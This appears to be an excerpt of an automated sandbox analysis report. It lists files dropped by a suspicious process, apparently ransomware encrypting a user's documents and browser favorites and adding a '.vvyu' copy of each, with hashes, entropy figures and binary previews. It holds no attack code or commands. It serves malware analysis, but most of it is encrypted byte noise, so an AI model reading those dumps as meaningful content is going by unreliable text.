W..3..</..-........v.......s...#.....H/.,.. ....WE..E.........yL..G......v.NM1N4.w....%.S.pG....l.:">....i.^8....$..nh.k.+P.r.......C......R.{z<....,.B.[GN....<...+r>B..>....nB7.....O^..k..=......=ln.K.]>.<.7..^..5&.WvW)`2o..C+......w8...P.yw#W...Zd.k...

C:\Users\user\Downloads\NVWZAPQSQL.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855132042905292
Encrypted:	false
SSDEEP:	24:Fk3/h1IuTJpSHFrnk+dWLwb5ITGpo+YeRnj0lKmdA3TbwsbD:FwIxHlkuGDwo5oglKmdSvwmD
MD5:	33DF1C596FAFB129EA13D87F5FBA452F
SHA1:	C01E81410FBF322BF836D8F6A41987EE6D8C41B8
SHA-256:	6F2361BDA59BF208A008713B3177CEE835E9053B5895F829E8EA53D217BE879C
SHA-512:	187822B0299D4D39D9083C2B22B189077FA115D340FD909AF30C2BA38950C400F726EFE665B77DA87CEE9D5A3F825EEC365FDEE69CD3BD69ECCF27D3E00D4D21
Malicious:	false
Preview:	NVWZAq7.[..^<.....La.w.;..S;4W..........\|.(..zJ.\...............f... .^.......y.I......4 .....r..S.....[.../..U..~...m_?....G...\%.R.e.....r..@O..qp/...iG$a........L.U...A.S..6..h....cE7..!o...e.....<K...jGPO`OtcFYF..(.. I..>.../.^.[.0.&..M..w...;h...$6.....{!.....`$..#3..../.}'IS...H.....a.Q.....g..ab9.N......jd....l:...8y..'....V\w.&:..M...3..L...j.........,.....F.TG.U.Dds.Ut..P....x\|9..._f.=..N>e.N.\\...k..v.YB...$.......Y)P.0.~...F3{..\4...L.T....C..K .n.@.......l.jm.....w}..1...u....U..^RF..4H.o....]~qZ..`. @..2...I..X......._(........^..\.DH.w...@..rz..~..&l../7........dX......I..L..?..#..;...{.<.4..M....JT..l...r.Xw.v...'.O..a...............B......X.2.`.`....zr.y.;...'..5.Y.z4...p.q....D........j,T..H...8?.5.....{E!.....H`\....4.EuW.J..u.X..$.x..H....\.T.......#..q\....T...s....qm.........{..-....;<,u~9.9.HU..M..q...'...J.A.19\t.S..ak2..6) .....G.]..'!.G....t..J............0L.T.S..l...K.?sF4.........J...x..

C:\Users\user\Downloads\NVWZAPQSQL.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855132042905292
Encrypted:	false
SSDEEP:	24:Fk3/h1IuTJpSHFrnk+dWLwb5ITGpo+YeRnj0lKmdA3TbwsbD:FwIxHlkuGDwo5oglKmdSvwmD
MD5:	33DF1C596FAFB129EA13D87F5FBA452F
SHA1:	C01E81410FBF322BF836D8F6A41987EE6D8C41B8
SHA-256:	6F2361BDA59BF208A008713B3177CEE835E9053B5895F829E8EA53D217BE879C
SHA-512:	187822B0299D4D39D9083C2B22B189077FA115D340FD909AF30C2BA38950C400F726EFE665B77DA87CEE9D5A3F825EEC365FDEE69CD3BD69ECCF27D3E00D4D21
Malicious:	false
Preview:	NVWZAq7.[..^<.....La.w.;..S;4W..........\|.(..zJ.\...............f... .^.......y.I......4 .....r..S.....[.../..U..~...m_?....G...\%.R.e.....r..@O..qp/...iG$a........L.U...A.S..6..h....cE7..!o...e.....<K...jGPO`OtcFYF..(.. I..>.../.^.[.0.&..M..w...;h...$6.....{!.....`$..#3..../.}'IS...H.....a.Q.....g..ab9.N......jd....l:...8y..'....V\w.&:..M...3..L...j.........,.....F.TG.U.Dds.Ut..P....x\|9..._f.=..N>e.N.\\...k..v.YB...$.......Y)P.0.~...F3{..\4...L.T....C..K .n.@.......l.jm.....w}..1...u....U..^RF..4H.o....]~qZ..`. @..2...I..X......._(........^..\.DH.w...@..rz..~..&l../7........dX......I..L..?..#..;...{.<.4..M....JT..l...r.Xw.v...'.O..a...............B......X.2.`.`....zr.y.;...'..5.Y.z4...p.q....D........j,T..H...8?.5.....{E!.....H`\....4.EuW.J..u.X..$.x..H....\.T.......#..q\....T...s....qm.........{..-....;<,u~9.9.HU..M..q...'...J.A.19\t.S..ak2..6) .....G.]..'!.G....t..J............0L.T.S..l...K.?sF4.........J...x..

C:\Users\user\Downloads\NYMMPCEIMA.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832282882774218
Encrypted:	false
SSDEEP:	24:Md8tqklBWbWZPTIH0tEUUzPETr//pvgqHMrILwTT8PsSp/w26WaV2/VIJBtvv99e:MqtzXWbWdIhUUITr//bk+wTTssM/3aVO
MD5:	CB6224CF67AB1B52BD03F5D7F44E4450
SHA1:	6D1CE4349B3BCE76C4DBF00D9F555633CBCFF410
SHA-256:	A04276056BFE41AE52FD477F44E31269C9AB49959BDC48FCE7B8483B08CC0FC5
SHA-512:	7DE9FD4BD4DEB0BF7D4C709A6840E0F4DAD1A3D02E9FCCB03C1189FCC6F3ABA9BEAA87C19DF82E13A9EA003F31BF0F87372E0AA9CC43E78EE95F7A65443CE2EC
Malicious:	false
Preview:	NYMMP.S..K!.m..!].g...A..+.B......._...U.P.H....[.w.......l..x.5CI4B...Cm}...6.......gX...p.M0....B\hL..!.p.\.d..G..8.D.."vn0.U`_.^....\|. .."xD.......d.K.r.Z\|.#.i4........!.iyJ.H.DC.0w.e..z..\..8..WZ.v.]@,....mGMjW.De....;.HMS9..}..9........O.!C......y...#(#...../..3.@...0n.....J...P....G.w...g.)..?.i3b........D..=.h(..+V..h......n..t..~f!..j...8..H...K....U.......Hf.B9....9..&........A2.su...bO..A[.Cm.J"R....>.d...C.H....w}C.-i..Q....T....>CW..H.L..g..m....P .1B.....<..L'..d.......a...96....Oc..<.._...}p..v...a.<3U..H/FQ....s-.m.1+."..W.X..Y.`...n3..T.......;bt.....2._...e...l?~...N4...z...........zh@j.....0.5....oS&/@8....;....]W.u..0..S......ru..q._8HT[...N.rS....t.b<.,.(m...D.D.r...."$..4p..V...{.'.Fk..U...D.......W..._.6.i.%X..[R..x.q.p.Z:"...T..,..qg..2[U-O....Ir#.B..Q.o....DQ.......8.H.UY....._.W0!..>..O.?....A.N.J.....c.........o..xfqeg.....g..8.....x.MpY.\.m.J.m7......m.#P0....[...or!.O...~..}b8.*....cQ\...M.....}........S<CE

C:\Users\user\Downloads\NYMMPCEIMA.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832282882774218
Encrypted:	false
SSDEEP:	24:Md8tqklBWbWZPTIH0tEUUzPETr//pvgqHMrILwTT8PsSp/w26WaV2/VIJBtvv99e:MqtzXWbWdIhUUITr//bk+wTTssM/3aVO
MD5:	CB6224CF67AB1B52BD03F5D7F44E4450
SHA1:	6D1CE4349B3BCE76C4DBF00D9F555633CBCFF410
SHA-256:	A04276056BFE41AE52FD477F44E31269C9AB49959BDC48FCE7B8483B08CC0FC5
SHA-512:	7DE9FD4BD4DEB0BF7D4C709A6840E0F4DAD1A3D02E9FCCB03C1189FCC6F3ABA9BEAA87C19DF82E13A9EA003F31BF0F87372E0AA9CC43E78EE95F7A65443CE2EC
Malicious:	false
Preview:	NYMMP.S..K!.m..!].g...A..+.B......._...U.P.H....[.w.......l..x.5CI4B...Cm}...6.......gX...p.M0....B\hL..!.p.\.d..G..8.D.."vn0.U`_.^....\|. .."xD.......d.K.r.Z\|.#.i4........!.iyJ.H.DC.0w.e..z..\..8..WZ.v.]@,....mGMjW.De....;.HMS9..}..9........O.!C......y...#(#...../..3.@...0n.....J...P....G.w...g.)..?.i3b........D..=.h(..+V..h......n..t..~f!..j...8..H...K....U.......Hf.B9....9..&........A2.su...bO..A[.Cm.J"R....>.d...C.H....w}C.-i..Q....T....>CW..H.L..g..m....P .1B.....<..L'..d.......a...96....Oc..<.._...}p..v...a.<3U..H/FQ....s-.m.1+."..W.X..Y.`...n3..T.......;bt.....2._...e...l?~...N4...z...........zh@j.....0.5....oS&/@8....;....]W.u..0..S......ru..q._8HT[...N.rS....t.b<.,.(m...D.D.r...."$..4p..V...{.'.Fk..U...D.......W..._.6.i.%X..[R..x.q.p.Z:"...T..,..qg..2[U-O....Ir#.B..Q.o....DQ.......8.H.UY....._.W0!..>..O.?....A.N.J.....c.........o..xfqeg.....g..8.....x.MpY.\.m.J.m7......m.#P0....[...or!.O...~..}b8.*....cQ\...M.....}........S<CE

C:\Users\user\Downloads\SQSJKEBWDT.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.821748760496115
Encrypted:	false
SSDEEP:	24:lLmH4Kobd8Yq2OW/6WyxpnTuYSsi4fvAuUnTqFBEnABKCrkLaAIJzmdDWUYgmLE7:RmH4t6tM/6NpnTuYSX4fIuUnTgO+KCef
MD5:	48205E044AA007CA24A3443A76341DE8
SHA1:	CCA75A07D758EBC3EF7415B868F81631A2EAAE87
SHA-256:	4E0623D6601265BB327871974072F390899E01E0F819854BF31303B61E421722
SHA-512:	A5FE18AECE37D6D78B1DE3B0476A0129FC5D7FECD2B6BD0164F11BB40BE7F5B1BDFFD50D6A9DDB71AD70D9AE06E2320153DFFAC8390A47BE28910C70DE3DA146
Malicious:	false
Preview:	SQSJKB`".6.+.q.?..rC.K..y..F~.Y..K....".{@.TO..1..<Z2wOt..B..Q...).\.!.C....-...K..-.....}.....f:m7L!.P...9W7~gc/o...?..cH.9oS=uDJ...."...>.#f.B./..?.l$..6.\z..L..%.X.....m.;z=NHxo.7S.CN..W......-.b../...I....+....)..hpq.F....n.a1u....p.....0........NY}..:zF...cd...WLk...,.....B...?............._...7R....=[7...^#<vn.q..y...&.C.Ys'...H.?]2.9.WF..i.)...V..-..1......6..Q..T..x...P...G..r.h..x.N.g3#......y.I..c.L.....g..9..1..}r.F..k"...P..3....bi..N.e.O.`..nJm.!s.:U.K..y...-.;.R..l......@p.,7.vy.I..7.9T.k.h...Q........FuH.o<....c....G..1.g8.w.Pja..........8...A/.!.Q#.H.T.L..kUuk.]...!.....W.....03.?{.t.V..L.....1......p.!....J...7..c..................e[...)Www..lJ...WT...H. .l.[h......`e..56..sd..N...g3d]!. ......c..m;V..`^.o.j@`.e.....p.`.....'.D........7...bR....L.`...7..<;C..T....G%.S.U.(us.es...w..@.;$....+.8k.A.0..~h..-...r.U....k.j.../.n.z.t...q....~9\|.....O.P.L.$..<.....U..D*........s.\ALY.^\...i..a4..l.......y^?..c6B.S..

C:\Users\user\Downloads\SQSJKEBWDT.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.821748760496115
Encrypted:	false
SSDEEP:	24:lLmH4Kobd8Yq2OW/6WyxpnTuYSsi4fvAuUnTqFBEnABKCrkLaAIJzmdDWUYgmLE7:RmH4t6tM/6NpnTuYSX4fIuUnTgO+KCef
MD5:	48205E044AA007CA24A3443A76341DE8
SHA1:	CCA75A07D758EBC3EF7415B868F81631A2EAAE87
SHA-256:	4E0623D6601265BB327871974072F390899E01E0F819854BF31303B61E421722
SHA-512:	A5FE18AECE37D6D78B1DE3B0476A0129FC5D7FECD2B6BD0164F11BB40BE7F5B1BDFFD50D6A9DDB71AD70D9AE06E2320153DFFAC8390A47BE28910C70DE3DA146
Malicious:	false
Preview:	SQSJKB`".6.+.q.?..rC.K..y..F~.Y..K....".{@.TO..1..<Z2wOt..B..Q...).\.!.C....-...K..-.....}.....f:m7L!.P...9W7~gc/o...?..cH.9oS=uDJ...."...>.#f.B./..?.l$..6.\z..L..%.X.....m.;z=NHxo.7S.CN..W......-.b../...I....+....)..hpq.F....n.a1u....p.....0........NY}..:zF...cd...WLk...,.....B...?............._...7R....=[7...^#<vn.q..y...&.C.Ys'...H.?]2.9.WF..i.)...V..-..1......6..Q..T..x...P...G..r.h..x.N.g3#......y.I..c.L.....g..9..1..}r.F..k"...P..3....bi..N.e.O.`..nJm.!s.:U.K..y...-.;.R..l......@p.,7.vy.I..7.9T.k.h...Q........FuH.o<....c....G..1.g8.w.Pja..........8...A/.!.Q#.H.T.L..kUuk.]...!.....W.....03.?{.t.V..L.....1......p.!....J...7..c..................e[...)Www..lJ...WT...H. .l.[h......`e..56..sd..N...g3d]!. ......c..m;V..`^.o.j@`.e.....p.`.....'.D........7...bR....L.`...7..<;C..T....G%.S.U.(us.es...w..@.;$....+.8k.A.0..~h..-...r.U....k.j.../.n.z.t...q....~9\|.....O.P.L.$..<.....U..D*........s.\ALY.^\...i..a4..l.......y^?..c6B.S..

C:\Users\user\Downloads\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834358105884507
Encrypted:	false
SSDEEP:	24:E5YhpN5mxyRA5jTobrmazZcbkknxkuGFPoXU0KxSEQt7IJYiVTqv6btG26sbD:5hp/mxyR+Tobaaz0JiuQzxSEQpIJYiVd
MD5:	F9E1088A9FD3AE0EC364694679FDEEB5
SHA1:	60F62C539869F9020AA953686EDA160D0AB648F1
SHA-256:	6D8DF03EECF93E9430B138FD8EC2028560240D89E64FD2A61ECB4D673D090524
SHA-512:	07FD2683EA37A755D4F95546DF6AB58AE810605D062B944BE8309EB643D985C42F8719B87B6D074007D24064239F2808E2CA197E6856E8EB09475388A973F103
Malicious:	false
Preview:	TQDFJ.....jba..)..%}............#...t.1i.jl.={..ta.gL..!v4m............A.7H.:.R..3"...~..+G...?...Y9\^52.<..o.V.s.4...k&V..9..6.F=.51..}..o.4..K<.....!.P...V)....U....}W.s..A..9...M={@-N.... O.c..5m@../Fx..+...;.d@..k.x&.-.._.@..O.x.%h,a.~....&.n......&.s.kE].]F.R\..N.. j>....9.3.,7..Gf..{j.L...I.r..N!A'....k....f.....X....!.....g&1.......<DY..".M.X.PM......H.A.a.2C.N.!..a...T..6\..u....H7..X....I...%x.H.....e..q....]o...w..)..=)S..U.6...7......Z$..F.J.D..#p(I...=...^.;dYU.s....R.R.k.e-..i...I.q},H......p....^..h9...b...z..... a.f.%x..2__.P.....#CRq.>C.....)Y.I47.....i..o..x...'.~......M......e......!..W..FCg.qXbf.6,........C._r......l..6.N@W......cl$.j-bsc.V.$..+S.r.~C.q.E.....!.._l..S....t<8E..{s.v./.......R..\2s...AR......b....z....A'>@.d8=.P..X.7..=<.:.W.....LU..-,.w.......%;6..a...&.\Tx..P+."KM.........EF.)dwG.>j..<.6D!...V....6...f."...&.=............!QV.[...^...@...... ;..FY&....b%..B.ucp.$9Q,...`$@.`..9.w.......o..y.8..u..p..lC

C:\Users\user\Downloads\TQDFJHPUIU.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834358105884507
Encrypted:	false
SSDEEP:	24:E5YhpN5mxyRA5jTobrmazZcbkknxkuGFPoXU0KxSEQt7IJYiVTqv6btG26sbD:5hp/mxyR+Tobaaz0JiuQzxSEQpIJYiVd
MD5:	F9E1088A9FD3AE0EC364694679FDEEB5
SHA1:	60F62C539869F9020AA953686EDA160D0AB648F1
SHA-256:	6D8DF03EECF93E9430B138FD8EC2028560240D89E64FD2A61ECB4D673D090524
SHA-512:	07FD2683EA37A755D4F95546DF6AB58AE810605D062B944BE8309EB643D985C42F8719B87B6D074007D24064239F2808E2CA197E6856E8EB09475388A973F103
Malicious:	false
Preview:	TQDFJ.....jba..)..%}............#...t.1i.jl.={..ta.gL..!v4m............A.7H.:.R..3"...~..+G...?...Y9\^52.<..o.V.s.4...k&V..9..6.F=.51..}..o.4..K<.....!.P...V)....U....}W.s..A..9...M={@-N.... O.c..5m@../Fx..+...;.d@..k.x&.-.._.@..O.x.%h,a.~....&.n......&.s.kE].]F.R\..N.. j>....9.3.,7..Gf..{j.L...I.r..N!A'....k....f.....X....!.....g&1.......<DY..".M.X.PM......H.A.a.2C.N.!..a...T..6\..u....H7..X....I...%x.H.....e..q....]o...w..)..=)S..U.6...7......Z$..F.J.D..#p(I...=...^.;dYU.s....R.R.k.e-..i...I.q},H......p....^..h9...b...z..... a.f.%x..2__.P.....#CRq.>C.....)Y.I47.....i..o..x...'.~......M......e......!..W..FCg.qXbf.6,........C._r......l..6.N@W......cl$.j-bsc.V.$..+S.r.~C.q.E.....!.._l..S....t<8E..{s.v./.......R..\2s...AR......b....z....A'>@.d8=.P..X.7..=<.:.W.....LU..-,.w.......%;6..a...&.\Tx..P+."KM.........EF.)dwG.>j..<.6D!...V....6...f."...&.=............!QV.[...^...@...... ;..FY&....b%..B.ucp.$9Q,...`$@.`..9.w.......o..y.8..u..p..lC

C:\Users\user\Downloads\ZGGKNSUKOP.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844326654865133
Encrypted:	false
SSDEEP:	24:0y74fwnbOfYIpDwZB3pn12KCKAYDXJS2y3hs0MgMYNV3edsbD:774UbkDs3pn4TKAoU13y0jNBcmD
MD5:	55BFA138E5D6423B0D59403ECC63EB22
SHA1:	D512BE5FB4F1B6DF4B165F57927EECC739D6EBE1
SHA-256:	8E16BED90E1E3B6C341A49801CA86F6DF2E57D3C0DE6813D03B261D61DA4A072
SHA-512:	2BC65B1D40FD006D944C6D1A1DF2F00B183773E9AB84408E2F0149A7869FD5A7BA9FE348E4D93CE1BE2719CFB490E0BE8E8819FD20AE4EA5D3E75A4A2A16C6CC
Malicious:	false
Preview:	ZGGKN.\_.:.:...........)...f....J.5..Pod..`..L...P,...r.UUiN..\|.<Be..O...y2f......M....ekf...+.M.....20v...is...\8E.R......e.......kI..q:UW.nG[..\|K....r.....FN...q.Ue..0.^....0.$f.de.@..$.p.s...f.=..I.7....ti,.,.`........A[...U.,...e].8.L=.. k.^..W.j.. ...........!..a.G...S?.H."yU.;...@:....w...........DW.2.&.c.`.l....n?.].g--....F...y..\.....}..D.A.LZO...H...pq....#..dLC.C.1.\+wA..7.... fk..&.OTt..R4L.n7...5.....Jl..=i..W.y.....t.T....M.._..v...A.;y.E.(#].8..k.i.}.]....i..f..U..9...Q..O...e.....Et.~7"....+..>mS2....Dn.ui...r..%.._.-...i..XD@...dF=.vRj...g.Bw.~.o..k..B..as%S.t~.X.=..*...%.}Q.(.....9h..i.D].c...9rq....)]..$J.k.C.xt......w.......$....}.7y...s.o,..U`&.......02.9qY...i.=.Zz.^....=R..?t....oUi.m>5.%..8...p.....t....a....`.h.9<....7..i.U.D3...PB..(W2lsh6I...aI.2~......v..xtCZ................`Z.)../_....Z.+...%:..Lds.`..!.S.]... @..i.Tm.....8....L^.......t.2~.......k.2......\|o..\...N~.H%.'.[xe.M..@...Q.I.? ..fp.?)>.S`2$....Z..!...

C:\Users\user\Downloads\ZGGKNSUKOP.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844326654865133
Encrypted:	false
SSDEEP:	24:0y74fwnbOfYIpDwZB3pn12KCKAYDXJS2y3hs0MgMYNV3edsbD:774UbkDs3pn4TKAoU13y0jNBcmD
MD5:	55BFA138E5D6423B0D59403ECC63EB22
SHA1:	D512BE5FB4F1B6DF4B165F57927EECC739D6EBE1
SHA-256:	8E16BED90E1E3B6C341A49801CA86F6DF2E57D3C0DE6813D03B261D61DA4A072
SHA-512:	2BC65B1D40FD006D944C6D1A1DF2F00B183773E9AB84408E2F0149A7869FD5A7BA9FE348E4D93CE1BE2719CFB490E0BE8E8819FD20AE4EA5D3E75A4A2A16C6CC
Malicious:	false
Preview:	ZGGKN.\_.:.:...........)...f....J.5..Pod..`..L...P,...r.UUiN..\|.<Be..O...y2f......M....ekf...+.M.....20v...is...\8E.R......e.......kI..q:UW.nG[..\|K....r.....FN...q.Ue..0.^....0.$f.de.@..$.p.s...f.=..I.7....ti,.,.`........A[...U.,...e].8.L=.. k.^..W.j.. ...........!..a.G...S?.H."yU.;...@:....w...........DW.2.&.c.`.l....n?.].g--....F...y..\.....}..D.A.LZO...H...pq....#..dLC.C.1.\+wA..7.... fk..&.OTt..R4L.n7...5.....Jl..=i..W.y.....t.T....M.._..v...A.;y.E.(#].8..k.i.}.]....i..f..U..9...Q..O...e.....Et.~7"....+..>mS2....Dn.ui...r..%.._.-...i..XD@...dF=.vRj...g.Bw.~.o..k..B..as%S.t~.X.=..*...%.}Q.(.....9h..i.D].c...9rq....)]..$J.k.C.xt......w.......$....}.7y...s.o,..U`&.......02.9qY...i.=.Zz.^....=R..?t....oUi.m>5.%..8...p.....t....a....`.h.9<....7..i.U.D3...PB..(W2lsh6I...aI.2~......v..xtCZ................`Z.)../_....Z.+...%:..Lds.`..!.S.]... @..i.Tm.....8....L^.......t.2~.......k.2......\|o..\...N~.H%.'.[xe.M..@...Q.I.? ..fp.?)>.S`2$....Z..!...

C:\Users\user\Favorites\Amazon.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.507863506798912
Encrypted:	false
SSDEEP:	12:F3AP85Efe0CkRtB+taivWjekVbj7tvwL1QJ6qZVfkscii9a:F3q85Efe0X+oiOjeIj7BE1QJ58sbD
MD5:	7A309336C4333BA9C9A7631AC7BFF151
SHA1:	58D6A460717EA91400A49EB970C950D1ABD8D410
SHA-256:	AF5CF0B8C8DBBF76622878648BA4E5268901DDDF15E4DDF2CC0A9ECCDC00AF69
SHA-512:	2D4145AA56080C15B8BE5DFCACC5F6046F8C900B184A5AB785AF98CEDFEA3FB1508F963566E03A3E2FF2B864F16118C4B9A543F4475111771B5832D94A912C2B
Malicious:	false
Preview:	[{000....=%O..."..y.6...,i...(..E......C.F..0.L..{.... .f^.u.o.q...k$.\|.:q..A.....as!.Cv....1:....l..V.....{.7bRg..D......Ad...`..D......?..,..."..n...P...Z.3ZV....#....8.\.z.M..k.=..Q......#.v.tU...W....}y......V..3.r.v..~@.>+........7....0L.t..0bF..)...fn86.la.......T.m.'42....`;M.`w..\|.1.....L.(.)..&u..M7..4..S..~....H....6.,/.i,6.z..\.P.Q..EqY.0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Amazon.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.507863506798912
Encrypted:	false
SSDEEP:	12:F3AP85Efe0CkRtB+taivWjekVbj7tvwL1QJ6qZVfkscii9a:F3q85Efe0X+oiOjeIj7BE1QJ58sbD
MD5:	7A309336C4333BA9C9A7631AC7BFF151
SHA1:	58D6A460717EA91400A49EB970C950D1ABD8D410
SHA-256:	AF5CF0B8C8DBBF76622878648BA4E5268901DDDF15E4DDF2CC0A9ECCDC00AF69
SHA-512:	2D4145AA56080C15B8BE5DFCACC5F6046F8C900B184A5AB785AF98CEDFEA3FB1508F963566E03A3E2FF2B864F16118C4B9A543F4475111771B5832D94A912C2B
Malicious:	false
Preview:	[{000....=%O..."..y.6...,i...(..E......C.F..0.L..{.... .f^.u.o.q...k$.\|.:q..A.....as!.Cv....1:....l..V.....{.7bRg..D......Ad...`..D......?..,..."..n...P...Z.3ZV....#....8.\.z.M..k.=..Q......#.v.tU...W....}y......V..3.r.v..~@.>+........7....0L.t..0bF..)...fn86.la.......T.m.'42....`;M.`w..\|.1.....L.(.)..&u..M7..4..S..~....H....6.,/.i,6.z..\.P.Q..EqY.0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.57474072441731
Encrypted:	false
SSDEEP:	12:gP17WBYO9aA8h1REljMNKZUlxC9Cuz9KkLlKdZkscii9a:617WBYpA8hPEh2lEE29K4NsbD
MD5:	5D78A1DEFF02272EAF97FAC2A4EB35DB
SHA1:	5A954A3DEB5126CB39C997A1B951A26AE29328EE
SHA-256:	6D164EF20F5DF26C56D4235F96F0C4EA46C599BA140F129BA206247A729191CD
SHA-512:	F18F76BA15DEA4DA6C39651059124F2A46097287880988059061DBFFCE138334F4B4178D062EE6F960AF0F0C8AE5695507C0C06C2163281E76518C201F7AE8C5
Malicious:	false
Preview:	[{000...(D't..-@........y..5.PI..N.p..y.vint..i...........y.zZ1..z9........d......Ou{.c.c.[.Tu.0.W.4.w&.g. ......M..\i..S...{_.Hq..Gv.P.\|.]...A...\|...d.V....D.B/..H.....Z......... .W.:.S.'.(.0G.D..m.......%3~..l... .>.!.......L.$.w+..w...y....}e..M...7X..`\|..LQ.=J.}..'.V.f...w..nh=.$..[?\|>T...(...~.-*!.......5U%......Ot.c.V.H.pP...?....[..........t,......8.0..F... t......@O.=....%.H.h.).4...xU.K#....1.....d.}.J6...d.....i8.h......0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.57474072441731
Encrypted:	false
SSDEEP:	12:gP17WBYO9aA8h1REljMNKZUlxC9Cuz9KkLlKdZkscii9a:617WBYpA8hPEh2lEE29K4NsbD
MD5:	5D78A1DEFF02272EAF97FAC2A4EB35DB
SHA1:	5A954A3DEB5126CB39C997A1B951A26AE29328EE
SHA-256:	6D164EF20F5DF26C56D4235F96F0C4EA46C599BA140F129BA206247A729191CD
SHA-512:	F18F76BA15DEA4DA6C39651059124F2A46097287880988059061DBFFCE138334F4B4178D062EE6F960AF0F0C8AE5695507C0C06C2163281E76518C201F7AE8C5
Malicious:	false
Preview:	[{000...(D't..-@........y..5.PI..N.p..y.vint..i...........y.zZ1..z9........d......Ou{.c.c.[.Tu.0.W.4.w&.g. ......M..\i..S...{_.Hq..Gv.P.\|.]...A...\|...d.V....D.B/..H.....Z......... .W.:.S.'.(.0G.D..m.......%3~..l... .>.!.......L.$.w+..w...y....}e..M...7X..`\|..LQ.=J.}..'.V.f...w..nh=.$..[?\|>T...(...~.-*!.......5U%......Ot.c.V.H.pP...?....[..........t,......8.0..F... t......@O.=....%.H.h.).4...xU.K#....1.....d.}.J6...d.....i8.h......0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.397537741714101
Encrypted:	false
SSDEEP:	12:0VrKfvUd/3QEOwTNsqsMMnnsb2zrwumlxKkscii9a:0K4iqnMnsb2SlxjsbD
MD5:	FB2F96A7601DF66AEC92DE652CC76357
SHA1:	DA2C577597E22D5EA732B3AE4109D6E542F87233
SHA-256:	308B59CA73A7A5DEA8A5CEFB3302837F2A71A12D3558C7E4CB000A5E1F1F608E
SHA-512:	BBA516CBCB8D943A9201158F6987F5378266650A95A4FA32D516CF2CDF27EFD23A94365112D9A7310B558284754DD6F1357AD7691C8A25D6A9041EB6EF9FDAD2
Malicious:	false
Preview:	[{000.`.ub...c.Gk@..3....1+n.\|...*L..e..?^...R..a.%.y.2...(C... .>.7...\|...4..i03'{......1y...1.l.=..!I}K7.....,+..H..n}...O..Ra.Ij!.........._.....f=35.v....I,....E.1.....e..T.....8....M...P.K+.M...8...(.&#.......}......Y.. .$.1..u.4...8.`M'..0...U.m..jC....(...#....@..i.d..f.u..a.+Y."5&SNu..~.....>...W.".......2.C...7.X...2..e......o.3L.k...0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.397537741714101
Encrypted:	false
SSDEEP:	12:0VrKfvUd/3QEOwTNsqsMMnnsb2zrwumlxKkscii9a:0K4iqnMnsb2SlxjsbD
